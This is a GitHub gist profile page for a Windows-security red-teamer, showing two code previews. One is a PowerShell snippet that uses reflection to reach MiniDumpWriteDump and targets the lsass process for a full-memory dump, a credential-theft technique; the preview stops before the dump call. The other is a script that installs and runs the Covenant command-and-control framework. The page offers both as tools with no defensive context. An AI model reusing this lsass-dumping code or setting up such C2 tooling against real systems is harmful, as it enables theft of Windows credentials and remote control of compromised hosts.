Christoph Falta cfalta

Random infosec guy. Rainbow-teamer. Focusing on windows security.

cfalta / procdump.ps1

Created April 14, 2020 19:00

quick process dump in powershell

	$DumpFilePath = "C:\temp\file.bin"

	$WER = [PSObject].Assembly.GetType("System.Management.Automation.WindowsErrorReporting")
	$WERNativeMethods = $WER.GetNestedType("NativeMethods", "NonPublic")
	$Flags = [Reflection.BindingFlags] "NonPublic, Static"
	$MiniDumpWriteDump = $WERNativeMethods.GetMethod("MiniDumpWriteDump", $Flags)
	$MiniDumpWithFullMemory = [UInt32] 2
	$Process = Get-Process lsass
	$ProcessId = $Process.Id
	$ProcessHandle = $Process.Handle

cfalta / install-and-run-covenant.sh

Created January 24, 2020 15:40

install and run covenant on ubuntu

	wget -q https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
	sudo dpkg -i packages-microsoft-prod.deb
	sudo apt-get update
	sudo apt-get install apt-transport-https
	sudo apt-get update
	sudo apt-get install dotnet-sdk-2.2
	git clone --recurse-submodules https://github.com/cobbr/Covenant
	cd Covenant/Covenant
	dotnet build
	dotnet run